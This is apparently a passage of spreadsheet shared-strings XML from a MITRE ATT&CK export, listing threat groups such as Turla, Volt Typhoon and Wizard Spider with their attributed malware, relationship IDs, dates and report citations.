    <t>(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--b143e00a-062e-424a-83c2-27559ff2cdf1</t>
  </si>
  <si>
    <t>S0663</t>
  </si>
  <si>
    <t>SysUpdate</t>
  </si>
  <si>
    <t>malware--c009560a-f097-45a3-8f9f-78ec1440a783</t>
  </si>
  <si>
    <t>relationship--a036174e-7bd3-4604-ba4c-c26cceb5fe67</t>
  </si>
  <si>
    <t>relationship--30ba627f-f567-444c-9c48-39db264ca78b</t>
  </si>
  <si>
    <t>relationship--88c2feed-474e-427c-a0ed-6a4e1576b145</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--fb6a8268-5a73-4ac0-8f61-439f472063d6</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZEUNION Feb 2019)</t>
  </si>
  <si>
    <t>relationship--a7b07cff-8743-4fe9-9999-8ad32995fa95</t>
  </si>
  <si>
    <t>relationship--614c18a5-2cee-48ac-898d-e1b85a91e44d</t>
  </si>
  <si>
    <t>12 November 2021</t>
  </si>
  <si>
    <t>relationship--5d1d76e6-ecd8-44e7-bc90-7701788dc28e</t>
  </si>
  <si>
    <t>relationship--3b6fc69c-9759-465a-b09c-a6161e4e2f56</t>
  </si>
  <si>
    <t>relationship--c354d751-4688-49c5-9f9a-0d2bc705f645</t>
  </si>
  <si>
    <t>relationship--8b38c61f-d128-4496-a15f-c91d121b39f6</t>
  </si>
  <si>
    <t>relationship--deb55b94-e38c-4941-9ebd-8cc3343c3eae</t>
  </si>
  <si>
    <t>G0076</t>
  </si>
  <si>
    <t>Thrip</t>
  </si>
  <si>
    <t>intrusion-set--d69e568e-9ac8-4c08-b32c-d93b43ba9172</t>
  </si>
  <si>
    <t>S0261</t>
  </si>
  <si>
    <t>Catchamas</t>
  </si>
  <si>
    <t>malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a</t>
  </si>
  <si>
    <t>(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>relationship--be2798b5-a9bc-409d-bdf5-eaca8f2eb94e</t>
  </si>
  <si>
    <t>relationship--70e7b609-b57d-4c71-931e-b8a658b0ba0d</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) used PsExec to move laterally between computers on the victim’s network.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>relationship--307f4aac-212f-4c81-9764-d0acf7ca0e55</t>
  </si>
  <si>
    <t>G0131</t>
  </si>
  <si>
    <t>Tonto Team</t>
  </si>
  <si>
    <t>intrusion-set--c5b81590-6814-4d2a-8baa-15c4b6c7f960</t>
  </si>
  <si>
    <t>S0268</t>
  </si>
  <si>
    <t>Bisonal</t>
  </si>
  <si>
    <t>malware--65ffc206-d7c1-45b3-b543-f6b726e7840d</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Kaspersky CactusPete Aug 2020)(Citation: Secureworks BRONZE HUNTLEY )(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--4d2c0b15-fb83-4ec1-9e3c-3b0707519278</t>
  </si>
  <si>
    <t>05 May 2021</t>
  </si>
  <si>
    <t>27 January 2022</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--a779fd0b-0fa0-4bcd-837f-4d3e12482ca1</t>
  </si>
  <si>
    <t>(Citation: Kaspersky CactusPete Aug 2020)</t>
  </si>
  <si>
    <t>relationship--420064ce-0bfd-4daa-9e4c-4b197634be19</t>
  </si>
  <si>
    <t>relationship--c20cc0d1-fe0b-4683-b6ed-bbb8736fe2ca</t>
  </si>
  <si>
    <t>relationship--6d4b2be8-946d-4ae7-a897-a5c92b00c512</t>
  </si>
  <si>
    <t>relationship--fcc1d2e7-f41d-4a06-85c6-f00ea602ddac</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--9c3c62d3-d97c-4478-b822-e7019861121d</t>
  </si>
  <si>
    <t>02 September 2021</t>
  </si>
  <si>
    <t>(Citation: Unit 42 ProjectM March 2016)</t>
  </si>
  <si>
    <t>relationship--074ed0d8-8a95-4090-a23b-6c3915587590</t>
  </si>
  <si>
    <t>09 September 2021</t>
  </si>
  <si>
    <t>S0644</t>
  </si>
  <si>
    <t>ObliqueRAT</t>
  </si>
  <si>
    <t>malware--5864e59f-eb4c-43ad-83b2-b5e4fae056c9</t>
  </si>
  <si>
    <t>(Citation: Talos Oblique RAT March 2021)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--0e9e8c43-24f5-401f-8e50-5b4a476ea31d</t>
  </si>
  <si>
    <t>S0643</t>
  </si>
  <si>
    <t>Peppy</t>
  </si>
  <si>
    <t>malware--6c2550d5-a01a-4bbb-a004-6ead348ba623</t>
  </si>
  <si>
    <t>relationship--c7429670-16be-43bb-b13d-35056c4c968e</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--2ca333e2-c94f-4cc1-af46-beae48ff3c43</t>
  </si>
  <si>
    <t>07 September 2021</t>
  </si>
  <si>
    <t>G0081</t>
  </si>
  <si>
    <t>Tropic Trooper</t>
  </si>
  <si>
    <t>intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>relationship--b5344ae6-8083-4a09-98f3-01c1491356dc</t>
  </si>
  <si>
    <t>S0387</t>
  </si>
  <si>
    <t>KeyBoy</t>
  </si>
  <si>
    <t>malware--5dd649c0-bca4-488b-bd85-b180474ec62e</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: CitizenLab Tropic Trooper Aug 2018)</t>
  </si>
  <si>
    <t>relationship--ef2cc3f0-b44f-4f56-ba46-45e736ce0e90</t>
  </si>
  <si>
    <t>17 June 2019</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>relationship--831143c2-3477-49e4-8806-c1e07be0fa79</t>
  </si>
  <si>
    <t>relationship--696abb07-b706-469e-83c2-1e29984c9532</t>
  </si>
  <si>
    <t>S0452</t>
  </si>
  <si>
    <t>USBferry</t>
  </si>
  <si>
    <t>malware--75bba379-4ba1-467e-8c60-ec2b269ee984</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--1b5dbd72-abeb-4d61-9a7f-917a17f272d1</t>
  </si>
  <si>
    <t>21 May 2020</t>
  </si>
  <si>
    <t>S0388</t>
  </si>
  <si>
    <t>YAHOYAH</t>
  </si>
  <si>
    <t>malware--cb444a16-3ea5-4a91-88c6-f329adcb8af3</t>
  </si>
  <si>
    <t>(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>relationship--e4ccb68f-5c52-4805-88d0-14d87268e562</t>
  </si>
  <si>
    <t>G0010</t>
  </si>
  <si>
    <t>Turla</t>
  </si>
  <si>
    <t>intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--5c0645e4-f0c7-4bb4-bedb-29a96a472fe0</t>
  </si>
  <si>
    <t>S0335</t>
  </si>
  <si>
    <t>Carbon</t>
  </si>
  <si>
    <t>malware--b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f</t>
  </si>
  <si>
    <t>(Citation: ESET Carbon Mar 2017)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>relationship--b2b885e0-3b49-4a38-80eb-30a1a3157ff0</t>
  </si>
  <si>
    <t>S0126</t>
  </si>
  <si>
    <t>ComRAT</t>
  </si>
  <si>
    <t>malware--da5880b4-f7da-4869-85f2-e0aba84b8565</t>
  </si>
  <si>
    <t>(Citation: Symantec Waterbug)(Citation: Unit 42 IronNetInjector February 2021 )(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>relationship--35a9c64c-c305-46bf-a216-c8bb1b051614</t>
  </si>
  <si>
    <t>S0538</t>
  </si>
  <si>
    <t>Crutch</t>
  </si>
  <si>
    <t>malware--925a6c52-5cf0-4fec-99de-b0d6917d8593</t>
  </si>
  <si>
    <t>(Citation: ESET Crutch December 2020)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--686d91dc-692b-48a0-829b-2556c6415f59</t>
  </si>
  <si>
    <t>06 December 2020</t>
  </si>
  <si>
    <t>02 December 2021</t>
  </si>
  <si>
    <t>(Citation: ESET Turla August 2018)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--40848159-b266-42df-9cf8-785b2f78bcfc</t>
  </si>
  <si>
    <t>07 December 2020</t>
  </si>
  <si>
    <t>S0091</t>
  </si>
  <si>
    <t>Epic</t>
  </si>
  <si>
    <t>malware--6b62e336-176f-417b-856a-8552dd8c44e1</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>relationship--e02d1cb4-1bb7-49b5-a918-5e0d194974aa</t>
  </si>
  <si>
    <t>S0168</t>
  </si>
  <si>
    <t>Gazer</t>
  </si>
  <si>
    <t>malware--76abb3ef-dafd-4762-97cb-a35379429db4</t>
  </si>
  <si>
    <t>(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--773e99eb-0739-42d3-afaa-aff65e86329d</t>
  </si>
  <si>
    <t>S0537</t>
  </si>
  <si>
    <t>HyperStack</t>
  </si>
  <si>
    <t>malware--2cf7dec3-66fc-423f-b2c7-58f1de243b4e</t>
  </si>
  <si>
    <t>(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--dac527e7-fffb-46de-8585-57a112cb1eba</t>
  </si>
  <si>
    <t>02 December 2020</t>
  </si>
  <si>
    <t>S0581</t>
  </si>
  <si>
    <t>IronNetInjector</t>
  </si>
  <si>
    <t>tool--b1595ddd-a783-482a-90e1-8afc8d48467e</t>
  </si>
  <si>
    <t>(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--5543599a-779f-4955-8f3e-99cc92b1e2fc</t>
  </si>
  <si>
    <t>25 February 2021</t>
  </si>
  <si>
    <t>relationship--54b38c51-b6b3-4d8a-9e6f-f257a3543939</t>
  </si>
  <si>
    <t>S0265</t>
  </si>
  <si>
    <t>Kazuar</t>
  </si>
  <si>
    <t>malware--536be338-e2ef-4a6b-afb6-8d5568b91eb2</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Kazuar May 2017)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--775d3c82-5863-43fa-8dfd-2f62382d53f1</t>
  </si>
  <si>
    <t>S0395</t>
  </si>
  <si>
    <t>LightNeuron</t>
  </si>
  <si>
    <t>malware--6ba1d7ae-d60b-43e6-9f08-a8b787e9d9cb</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>relationship--a4d6544d-0d01-4cdd-81e8-4b6382675f10</t>
  </si>
  <si>
    <t>(Citation: ESET Turla Mosquito May 2018)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--b9c05069-a05f-4b74-9b4d-275c64f2e124</t>
  </si>
  <si>
    <t>S0256</t>
  </si>
  <si>
    <t>Mosquito</t>
  </si>
  <si>
    <t>malware--92b55426-109f-4d93-899f-1833ce91ff90</t>
  </si>
  <si>
    <t>(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>relationship--43e9c37e-9e57-4130-8510-05c65bfde6f8</t>
  </si>
  <si>
    <t>(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--e515dc29-7a69-4d0f-8a2a-d27722f3bd6b</t>
  </si>
  <si>
    <t>relationship--cd79beea-20ee-4b4f-aad1-5cc34d27398c</t>
  </si>
  <si>
    <t>S0587</t>
  </si>
  <si>
    <t>Penquin</t>
  </si>
  <si>
    <t>malware--d18cb958-f4ad-4fb3-bb4f-e8994d206550</t>
  </si>
  <si>
    <t>(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--f2a29786-05d5-4566-bece-14d5c1a212c1</t>
  </si>
  <si>
    <t>11 March 2021</t>
  </si>
  <si>
    <t>S0393</t>
  </si>
  <si>
    <t>PowerStallion</t>
  </si>
  <si>
    <t>malware--dcac85c1-6485-4790-84f6-de5e6f6b91dd</t>
  </si>
  <si>
    <t>(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--76428147-d359-4568-a1a2-7cc3da632da4</t>
  </si>
  <si>
    <t>relationship--08fccacb-803c-4d00-baa7-ed6af83660ae</t>
  </si>
  <si>
    <t>08 July 2019</t>
  </si>
  <si>
    <t>relationship--d0ed3128-67f0-43dd-b1d9-01843eb71b77</t>
  </si>
  <si>
    <t>relationship--8cdfc8e4-b657-4ae9-b9ee-9b6107fae796</t>
  </si>
  <si>
    <t>relationship--bd2a23f7-88cd-47d2-b30e-9356d0204a8e</t>
  </si>
  <si>
    <t>S0668</t>
  </si>
  <si>
    <t>TinyTurla</t>
  </si>
  <si>
    <t>malware--2a7c1bb7-cd12-456e-810d-ab3bf8457bab</t>
  </si>
  <si>
    <t>(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>relationship--ec1a882a-b9d1-469f-b944-26d684b28a1e</t>
  </si>
  <si>
    <t>S0022</t>
  </si>
  <si>
    <t>Uroburos</t>
  </si>
  <si>
    <t>malware--80a014ba-3fef-4768-990b-37d8bd10d7f4</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--6a87ff58-10b1-4fbc-a633-d7d8a34d1b29</t>
  </si>
  <si>
    <t>02 August 2023</t>
  </si>
  <si>
    <t>relationship--36f14542-1dd2-4b2e-b69f-d7f38ea9800e</t>
  </si>
  <si>
    <t>S0102</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>tool--b35068ec-107a-4266-bda8-eb7036267aea</t>
  </si>
  <si>
    <t>relationship--1ab3f63b-bd80-4e4c-8f62-79f26b9724ab</t>
  </si>
  <si>
    <t>relationship--3643f451-322d-4f38-91a4-00a55a42c7f5</t>
  </si>
  <si>
    <t>G0123</t>
  </si>
  <si>
    <t>Volatile Cedar</t>
  </si>
  <si>
    <t>intrusion-set--b2e34388-6938-4c59-a702-80dc219e15e3</t>
  </si>
  <si>
    <t>S0572</t>
  </si>
  <si>
    <t>Caterpillar WebShell</t>
  </si>
  <si>
    <t>malware--751b77e6-af1f-483b-93fe-eddf17f92a64</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lebanese Cedar Jan 2021)(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>relationship--5b642677-f57c-4eb7-9e9e-33e12de48cd1</t>
  </si>
  <si>
    <t>10 February 2021</t>
  </si>
  <si>
    <t>S0569</t>
  </si>
  <si>
    <t>Explosive</t>
  </si>
  <si>
    <t>malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--72ff8ebb-a0fe-4ea0-9e4a-0f9aa2d48bc5</t>
  </si>
  <si>
    <t>08 February 2021</t>
  </si>
  <si>
    <t>G1017</t>
  </si>
  <si>
    <t>Volt Typhoon</t>
  </si>
  <si>
    <t>intrusion-set--174279b4-399f-4ddb-966e-5efedd1dd5f2</t>
  </si>
  <si>
    <t>(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--c93cacac-5ecf-49cb-8377-18e319545329</t>
  </si>
  <si>
    <t>31 July 2023</t>
  </si>
  <si>
    <t>(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--8329b484-4c42-4c30-8565-a742bff07b0c</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--ec0161c2-2e79-4166-b3e5-5a7026366865</t>
  </si>
  <si>
    <t>relationship--e22619ba-a141-405c-92e2-4f157f953c14</t>
  </si>
  <si>
    <t>(Citation: Microsoft Volt Typhoon May 2023)</t>
  </si>
  <si>
    <t>relationship--ad6cad0b-d827-4182-baf9-826c6788cf4e</t>
  </si>
  <si>
    <t>(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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G0090</t>
  </si>
  <si>
    <t>WIRTE</t>
  </si>
  <si>
    <t>intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1</t>
  </si>
  <si>
    <t>(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>relationship--464c9ae2-09b1-499d-8477-c05926537e6b</t>
  </si>
  <si>
    <t>S0679</t>
  </si>
  <si>
    <t>Ferocious</t>
  </si>
  <si>
    <t>malware--73d08401-005f-4e1f-90b9-8f45d120879f</t>
  </si>
  <si>
    <t>(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--22e9c279-0cb2-4ad1-85b2-37826f20db1f</t>
  </si>
  <si>
    <t>S0680</t>
  </si>
  <si>
    <t>LitePower</t>
  </si>
  <si>
    <t>malware--9020f5c7-efde-4125-a4f1-1b70f1274ddd</t>
  </si>
  <si>
    <t>relationship--00fd8c87-da99-42b3-a792-0d224732c84a</t>
  </si>
  <si>
    <t>G0107</t>
  </si>
  <si>
    <t>Whitefly</t>
  </si>
  <si>
    <t>intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e</t>
  </si>
  <si>
    <t>(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--eda182e5-ad1a-466b-8ede-664a2c778076</t>
  </si>
  <si>
    <t>G0124</t>
  </si>
  <si>
    <t>Windigo</t>
  </si>
  <si>
    <t>intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a</t>
  </si>
  <si>
    <t>S0377</t>
  </si>
  <si>
    <t>Ebury</t>
  </si>
  <si>
    <t>malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51</t>
  </si>
  <si>
    <t>(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--66a73f1e-dfb8-4509-be62-787c9a14c221</t>
  </si>
  <si>
    <t>G0112</t>
  </si>
  <si>
    <t>Windshift</t>
  </si>
  <si>
    <t>intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1</t>
  </si>
  <si>
    <t>S0466</t>
  </si>
  <si>
    <t>WindTail</t>
  </si>
  <si>
    <t>malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541</t>
  </si>
  <si>
    <t>(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--4fb841dd-93d8-404a-8738-5fe19a53c730</t>
  </si>
  <si>
    <t>G0044</t>
  </si>
  <si>
    <t>Winnti Group</t>
  </si>
  <si>
    <t>intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff</t>
  </si>
  <si>
    <t>S0501</t>
  </si>
  <si>
    <t>PipeMon</t>
  </si>
  <si>
    <t>malware--8393dac0-0583-456a-9372-fd81691bca20</t>
  </si>
  <si>
    <t>(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--33344564-0586-47fa-965f-ec9b4a462491</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--f9911b03-f413-483b-b228-f5a82657c2d1</t>
  </si>
  <si>
    <t>S0141</t>
  </si>
  <si>
    <t>Winnti for Windows</t>
  </si>
  <si>
    <t>malware--d3afa961-a80c-4043-9509-282cdf69ab21</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)</t>
  </si>
  <si>
    <t>relationship--a70d06e8-63dd-4cb3-83a5-f7bd8f2a8132</t>
  </si>
  <si>
    <t>G0102</t>
  </si>
  <si>
    <t>Wizard Spider</t>
  </si>
  <si>
    <t>intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7</t>
  </si>
  <si>
    <t>(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--1dd1bd5b-8639-48bd-81bd-c34c61fd464a</t>
  </si>
  <si>
    <t>12 September 2023</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--1deb3a34-8b7d-449d-8213-81a73fd9d642</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--4bac5bdb-493b-4c32-882d-ce77786d12c9</t>
  </si>
  <si>
    <t>(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--3b3c27ed-0129-48bf-8c79-e86d73e5b212</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</si>
  <si>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</si>
  <si>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relationship--fcee0cef-7d5b-49da-928c-2a3d0cfd06b0</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Wizard Spider October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--7a38509d-5468-4b8f-831e-a4233a36a845</t>
  </si>
  <si>
    <t>S0024</t>
  </si>
  <si>
    <t>Dyre</t>
  </si>
  <si>
    <t>malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe</t>
  </si>
  <si>
    <t>(Citation: Forbes Dyre May 2017)(Citation: CrowdStrike Wizard Spider March 2019)(Citation: Malwarebytes TrickBot Sep 2019)</t>
  </si>
  <si>
    <t>relationship--61805115-3044-4ed7-91f4-074b2a073e02</t>
  </si>
  <si>
    <t>15 June 2020</t>
  </si>
  <si>
    <t>S0367</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>malware--32066e94-3112-48ca-b9eb-ba2b59d2f023</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>relationship--8263754e-20a6-49ac-9ffb-3f0e9113b228</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--d73c0fd6-cbd9-4eaa-abca-a1626364ab1b</t>
  </si>
  <si>
    <t>relationship--5d7d90a4-1ea6-4eca-94bd-3461d9a54229</t>
  </si>
  <si>
    <t>relationship--4d0e6809-943f-424b-b8e9-f3b8baa11411</t>
  </si>
  <si>
    <t>(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>relationship--c118e50b-4559-4bff-bde5-78aa426f3db4</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</si>
  <si>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</si>
  <si>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relationship--d64f970a-8003-41bf-9769-d849c12340ed</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</si>
  <si>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</si>
  <si>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relationship--585842e6-fe9a-4508-8e67-c232f8aa5e76</t>
  </si>
  <si>
    <t>(Citation: DFIR Ryuk's Return October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)</t>
  </si>
  <si>
    <t>relationship--43b9a1b5-6f95-4c6c-8e1f-59f9049e3afb</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--fc19dd7e-415d-4e27-92bd-262392b6d38f</t>
  </si>
  <si>
    <t>S1071</t>
  </si>
  <si>
    <t>Rubeus</t>
  </si>
  <si>
    <t>tool--e33267fe-099f-4af2-8730-63d49f8813b2</t>
  </si>
  <si>
    <t>relationship--afa1618c-6a9b-49a4-8105-5cae16b3415f</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</si>
  <si>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t>
  </si>
  <si>
    <t>relationship--6895e54e-3968-41a9-9013-a082cd46fa44</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: CrowdStrike Wizard Spider October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--02e03773-7cea-4b40-bf96-f22ccbc7187f</t>
  </si>
  <si>
    <t>G0018</t>
  </si>
  <si>
    <t>admin@338</t>
  </si>
  <si>
    <t>intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756</t>
  </si>
  <si>
    <t>S0043</t>
  </si>
  <si>
    <t>BUBBLEWRAP</t>
  </si>
  <si>
    <t>malware--123bd7b3-675c-4b1a-8482-c55782b20e2b</t>
  </si>
  <si>
    <t>(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--013ab34f-54bf-4813-bd37-42a4eebb8d52</t>
  </si>
  <si>
    <t>S0042</t>
  </si>
  <si>
    <t>LOWBALL</t>
  </si>
  <si>
    <t>malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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G0045</t>
  </si>
  <si>
    <t>menuPass</t>
  </si>
  <si>
    <t>intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f</t>
  </si>
  <si>
    <t>(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--b593a75c-245f-449c-861b-b283c47357f0</t>
  </si>
  <si>
    <t>S0144</t>
  </si>
  <si>
    <t>ChChes</t>
  </si>
  <si>
    <t>malware--dc5d1a33-62aa-4a0c-aa8c-589b87beb11e</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--845482a1-a062-407d-a83e-90d883d1d91b</t>
  </si>
  <si>
    <t>(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--b8e169f0-2d84-4785-ba46-0cd79082fcf5</t>
  </si>
  <si>
    <t>S0624</t>
  </si>
  <si>
    <t>Ecipekac</t>
  </si>
  <si>
    <t>malware--292eb0c5-b8e8-4af6-9e8f-0fda6b4528d3</t>
  </si>
  <si>
    <t>relationship--d810e14a-e78b-4e65-842b-c1b7b727750a</t>
  </si>
  <si>
    <t>S0152</t>
  </si>
  <si>
    <t>EvilGrab</t>
  </si>
  <si>
    <t>malware--2f1a9fd0-3b7c-4d77-a358-78db13adbe78</t>
  </si>
  <si>
    <t>relationship--cfc7da70-d7c5-4508-8f50-1c3107269633</t>
  </si>
  <si>
    <t>S0628</t>
  </si>
  <si>
    <t>FYAnti</t>
  </si>
  <si>
    <t>malware--434ba392-ebdc-488b-b1ef-518deea65774</t>
  </si>
  <si>
    <t>relationship--10d94e64-2702-42cd-b188-a404ed8feb11</t>
  </si>
  <si>
    <t>22 June 2021</t>
  </si>
  <si>
    <t>relationship--d61f5cc3-e075-4a5b-ac7c-e77feac1d310</t>
  </si>
  <si>
    <t>relationship--51372934-2c81-4db7-aa38-cbb173698cc2</t>
  </si>
  <si>
    <t>relationship--7193ed4c-7169-46fa-9294-d74d912510d0</t>
  </si>
  <si>
    <t>S0626</t>
  </si>
  <si>
    <t>P8RAT</t>
  </si>
  <si>
    <t>malware--7c58fff0-d206-4db1-96b1-e3a9e0e320b9</t>
  </si>
  <si>
    <t>relationship--355d8ef4-ed79-49e4-b287-feb525d33ac4</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--e5f75ae0-45f5-48b8-938f-f0d9e17e53eb</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)</t>
  </si>
  <si>
    <t>relationship--68487d82-458b-4f45-b1c8-c6e4affaa226</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
